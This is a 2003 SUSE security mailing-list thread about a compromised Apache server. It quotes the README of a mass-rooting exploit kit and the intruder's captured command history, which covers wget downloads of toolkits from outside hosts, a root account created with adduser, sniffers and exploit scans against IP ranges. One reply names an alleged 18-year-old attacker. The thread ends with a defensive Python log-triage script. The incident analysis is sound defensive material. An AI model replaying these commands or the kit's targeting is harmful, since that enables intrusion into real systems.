quote from "boom.tar.gz" (see if you find somethin' that sounds familiar):

WARNING, this is a powerful tool, you can gain root access on many systems.
Use it at your own risk.

It scans for vulnerabilities in different OS and daemons:

The BIND scan:
Gains root access on all nonpatched boxes running linux with the following
bind versions:
  ISC BIND 8.2
  ISC BIND 8.2.1
  ISC BIND 8.2.2
  ISC BIND 8.2.2-P3
  ISC BIND 8.2.2-P5
  ISC BIND 8.2.2-P7

The LPD scan:
Gains root access on all nonpatched boxes running linux RedHat 7.0 with lpd
from distribution.

The FTPD scan:
Gains root access on all nonpatched boxes running the following OS/ftp
daemons:
  Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]
  Debian potato [wu-ftpd_2.6.0-3.deb]
  Debian potato [wu-ftpd_2.6.0-5.1.deb]
  Debian potato [wu-ftpd_2.6.0-5.3.deb]
  Debian sid [wu-ftpd_2.6.1-5_i386.deb]
  Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
  Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
  Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]
  Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
  Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
  RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
  RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
  RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
  RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
  RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
  RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
  RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
  RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
  RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
  RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
  SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
  SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
  SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
  SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
  SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
  SuSE 7.0 [wuftpd.rpm]
  SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
  SuSE 7.1 [wuftpd.rpm]
  SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
  SuSE 7.2 [wuftpd.rpm]
  SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
  SuSE 7.3 [wuftpd.rpm]
  SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
  Slackware 7.1

The SSHD scan:
Gains root access on all nonpatched boxes running the following versions:
  Linux:
    SSH-1.5-1.2.25
    SSH-1.5-1.2.26
    SSH-1.5-1.2.27
    SSH-1.5-1.2.30
    SSH-1.5-1.2.31
    SSH-1.99-OpenSSH_2.2.0p1
    SSH-1.5-OpenSSH-1.2
    SSH-1.5-OpenSSH-1.2.2
    SSH-1.5-OpenSSH-1.2.3
  OpenBSD 3.x:
    OpenSSH 2.9.9 - 33

The RPC scan:
Gains root access on multiple RPC vulnerabilities involving
Linux/SunOS/Solaris.

The TELNED scan:
Gains root access on all nonpatched boxes running the following OS's:
  Most of the BSD OS's

The POP3 scan:
Gains root access on all nonpatched boxes running QPOP 3.0b

For further upgrades send me new exploits at k1net1c@k1net1c.net

The SSL scan:
Gains access on almost all linux boxes running OpenSSL 0.9.6d and older.
Spawns a shell uid=apache.

----- Original Message -----
From: "Radu Voicu" <suse@ploiesti.rdsnet.ro>
To: "Marco Lum" <marco@hkservice.com>; "suse-security" <suse-security@suse.com>
Sent: Wednesday, September 03, 2003 7:53 PM
Subject: Re: [suse-security] Apache Gain Remote Shell Access
curiosity kills the cat:
http://www.vulturul.org/ = A Romanian guy, 18 years old, his name is Brisan Andrei :)
----- Original Message -----
From: "Marco Lum" <marco@hkservice.com>
To: "suse-security" <suse-security@suse.com>
Sent: Wednesday, September 03, 2003 7:43 PM
Subject: [suse-security] Apache Gain Remote Shell Access
Help, Help, Somebody help!!!
I found that somebody gained access using wwwrun, downloaded programs and tried to hack into other servers.
The following was found in Apache's error_log:
--09:41:10--  http://www.vulturul.org/vulturul/vulturu.tgz
           => `vulturu.tgz'
Resolving www.vulturul.org... done.
Connecting to www.vulturul.org[195.110.124.188]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,432 [application/x-tar]
0K ......... 100%
13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
bind: Address already in use
bind: Address already in use
--09:33:57--  http://geocities.com/supers7ar/bin.tar.gz
           => `bin.tar.gz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,748 [application/x-gzip]
0K .......... ......... 100%
65.37 KB/s
09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
sh: line 1: ./bin.tar.gz: Permission denied
gzip: stdin: not in gzip format
tar: Child returned status 1
--15:50:22--  http://195.174.78.202/a.out
           => `a.out'
Resolving 195.174.78.202... done.
Connecting to 195.174.78.202:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13,444 [text/plain]
0K .......... ... 100%
3.37 KB/s
15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
sh: line 1: ./a.out: Permission denied
chmod: invalid mode string: `x'
sh: line 1: ./a.out: Permission denied
Bad syntax, perhaps a bogus '-'?
sh: line 1: cd: /tmp/vulturu: No such file or directory
--20:25:35--  http://www.vulturul.org/vulturul/vulturu.tgz
           => `vulturu.tgz'
Resolving www.vulturul.org... done.
Connecting to www.vulturul.org[195.110.124.188]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,432 [application/x-tar]
0K ......... 100%
13.67 KB/s
20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]
tar: Error exit delayed from previous errors
sh: line 1: cd: /tmp/": No such file or directory
Also found his command history:
id
/usr/sbin/adduser vulturul -u0 -g0 -M;
cd /usr/local/games/
ls -ax
wget www.vulturul.org/vulturul/bnc.tgz
cd /tmp/" "
socklist
killall -9 nsl
ls -ax
rm -rf epcs2
rm -rf ns
rm -rf nsl
rm -rf p
rm -rf pk
ls -ax
wget www.vulturul.org/vulturul/bnc.tgz
tar xvfz bnc.tgz
mv psybnc "~. "
cd "~. "
mv psybnc " "
export PATH=:PATH
./" "
id
ls --color
./li
ls --color
./p
exec ./p 8003
id
pwd
cd ..
cd ..
ls -ax
ls -ax --color
rm -rf edu.gz
rm -rf local.tar.gz
rm -rf local
cd 3du
ls --color
ls --color
./scan 200.13.230.37
./scan 200.13.230.37 -d 6
./scan 202.30.198.226 -d 6
/scan 202.186.250.157
./scan
./scan 202.186.250.157
./scan 202.186.250.157 -d 6
./scan 64.106.104.84 -d 6
./scan 64.106.104.84 -d 6
./scan 128.119.213.136 -d 2
d ..
cd ..
ls -ax
cd atd
ls -ax
./osslmass2 mass.log
./osslmass2 mass.log
cd ../atd
ls -ax
cd ..
ls -ax --color
pico
./pico
mv pico /usr/bin
pico
ls -ax
mv pico /usr/bin
cp pico /usr/bin/pico
cd 3du
ls -ax --color
cd ..
wget http://geocities.com/supers7ar/boom.tar.gz
tar xvfz boom.tar.gz
cd boom
ls -ax
./r00t
./r00t -t 193.231.142 -d 3
./r00t -t 193.231.142 -d 2
./r00t -t 193.231.142 -d 4
./r00t -t 193.231.142 -d 7
./r00t -t 193.231.142 -d 8
cd ..
pwd
wget http://geocities.com/supers7ar/sshup.tar.gz
tar xvfz sshup.tar.gz
cd ssh-3.0.1/
ls -ax
cd ..
rm -rf ssh-3.0.1/
rm -rf sshup.tar.gz
ls -ax --color
rm -rf boom.tar.gz
cd ~.
cd " ~.
q
q
}
q
exit
ls -ax
wget www.vulturul.org/vulturul/linsniffer
chmod +x linsniffer
./linsniffer
ls -ax
rm -rf linsniffer
ls -ax --color
id
./heh
./r00t -t 128.100.20 -d 8
./r00t -t 193.231.142 -d 3
./r00t -t 193.231.142 -d 2
./scan 200.13.230.37
Please help, I can't find where he got in!
-- Marco Lum Net Service Manager
____________________________________________________________________________
System Development Service Inter/Intra/Local-Area Networking Service
VOICE: +852 2851 1190 FAX : +852 2851 1109 Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com
HK Service Company HK Service Consultants Limited
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here
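The wget banners and "sh: line 1:" errors are in Apache's error_log because httpd attaches its own stderr to the ErrorLog and a shell spawned from a compromised worker inherits that descriptor, so the stderr of every tool the intruder ran went there; that is the trail to look for on other hosts. As an added example (not code from any poster on this thread), a Python triage pass over such a log; the patterns and the sample log lines are constructed here, with example.invalid hosts in place of the real ones.

```python
import re

# Added example, not code from the thread. Apache points its own stderr at the
# ErrorLog and a shell spawned from a compromised httpd child inherits it, so
# tool stderr lands in error_log. Patterns are assumptions modelled on the post.
PATTERNS = [
    ("download",  re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+://\S+)")),  # wget banner
    ("saved",     re.compile(r"`([^']+)' saved \[\d+/\d+\]")),        # wget finished
    ("shell_err", re.compile(r"^(?:sh|bash): line \d+: (.+)$")),      # shell stderr
    ("tool_err",  re.compile(r"^(?:tar|gzip|chmod): (.+)$")),         # unpack/exec noise
    ("bind_fail", re.compile(r"^bind: Address already in use")),      # listener start
]

def triage_error_log(text):
    """Return (kind, detail, line_no) for lines that look like command stderr.
    Regular Apache entries start with a bracketed timestamp and are skipped."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("["):
            continue
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if m:
                findings.append((kind, m.group(1) if m.groups() else line, no))
                break
    return findings

def downloaded_urls(findings):
    """Distinct fetched URLs in first-seen order: what to block and retrieve."""
    urls = []
    for kind, detail, _ in findings:
        if kind == "download" and detail not in urls:
            urls.append(detail)
    return urls

# Constructed sample shaped like the post's error_log, with example hosts.
SAMPLE_LOG = """\
[Wed Sep 03 09:40:02 2003] [error] [client 192.0.2.7] File does not exist: /srv/www/htdocs/favicon.ico
--09:41:10--  http://files.example.invalid/kit/kit.tgz
           => `kit.tgz'
09:41:17 (13.69 KB/s) - `kit.tgz' saved [9432/9432]
sh: line 1: ./kit.tgz: Permission denied
gzip: stdin: not in gzip format
tar: Child returned status 1
--09:43:01--  http://files.example.invalid/kit/kit.tgz
sh: line 1: cd: /tmp/kit: No such file or directory
bind: Address already in use
"""
```

Feed the real error_log contents to triage_error_log; the URLs from downloaded_urls are the first indicators to block at the perimeter and to fetch into a sandbox for analysis.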